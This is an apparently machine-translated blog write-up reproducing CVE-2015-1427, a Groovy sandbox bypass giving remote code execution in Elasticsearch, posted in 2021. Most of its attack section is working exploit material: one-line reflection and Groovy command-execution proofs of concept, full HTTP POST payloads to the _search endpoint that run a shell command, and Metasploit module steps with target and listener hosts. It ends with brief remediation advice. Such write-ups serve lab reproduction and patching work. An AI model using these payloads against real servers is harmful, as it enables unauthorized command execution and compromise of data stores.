CVE-2015-1427 ElasticSearch (Groovy sandbox bypass && Code Execution Vulnerability)

Vulnerability profile

After CVE-2014-3120, the default dynamic scripting language of ElasticSearch was changed to Groovy, and sandbox was added, but direct execution of dynamic language is still supported by default. This vulnerability: 1. It is bypassed by a sandbox; 2. It is a Google Code Execution Vulnerability.

The reason for the vulnerability is very simple. Due to incomplete Java dangerous methods in the sandbox code blacklist, malicious users can still use reflection methods to execute java code. That's it? Of course not! It's funny that the Elasticsearch development team didn't fully understand the power of Groovy and thought that it could be protected from attack just by preventing users from calling java reflection. Let's take a look at Groovy's Description:

groovy

you 're right! Groovy is a development language, which means that we can implement code execution without using Java. If it's just a sandbox problem, it's good to fix the black-and-white list so that the attacker can't bypass the sandbox and use java reflection, but how can a language limit most of its functions by relying on the black-and-white list? So not using groovy as a programming language is the real reason for this problem.

Groovy language sandbox

ElasticSearch supports the use of Groovy language "in the sandbox" as dynamic scripts, but obviously the official work is not done well. lupin and tang3 respectively propose two methods to execute commands:

  1. Since there is a sandbox for executing Java code, lupin's method is to find ways to bypass the sandbox, such as using Java reflection

  2. Groovy was originally a language, so tang3 found another way to use the methods supported by groovy language to directly execute commands without using Java language

Therefore, according to the idea of these two execution vulnerabilities, we can obtain two different POC S.

Java Sandbox bypass method:
java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()
Goovy Direct execution command method:
def command='id';def res=command.execute().text;res

Loophole recurrence

Startup environment: docker compose up - D

After the environment starts, access http://your-ip:9200 You can see the default homepage of ElasticSearch.

http://127.0.0.1:9200/
Since at least one piece of data in es is required during query, send the following data packet and add one data:

POST /website/blog/  HTTP/1.1
Host: 127.0.0.1:9200
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 30

{
	  "name": "guiltyfet"
}

Using reflection mechanism to execute JAVA code Payload:

POST /_search?pretty HTTP/1.1
Host: 127.0.0.1:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 491

{
    "size":1,
    "script_fields": {
        "test#": {  
            "script":

             "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getInputStream())).readLines()",

            "lang": "groovy"
        }
    }

}

results of enforcement
Executing commands using Groovy language

POST /_search?pretty HTTP/1.1
Host: 127.0.0.1:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 164

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

MSF
use /multi/elsaticsearch/search_groovy_script
set RHOST X.X.X.X
set LHOST X.X.X.X
show options
exploit

Repair scheme

Method 1: upgrade to the latest official version
 Method 2: in ElasticSearch Under file /config/elasticsearch.yml Add: script.groovy.sandbox.enabled: false

Tags: Apache solr lucene

Posted on Tue, 16 Nov 2021 21:03:44 -0500 by SirJinX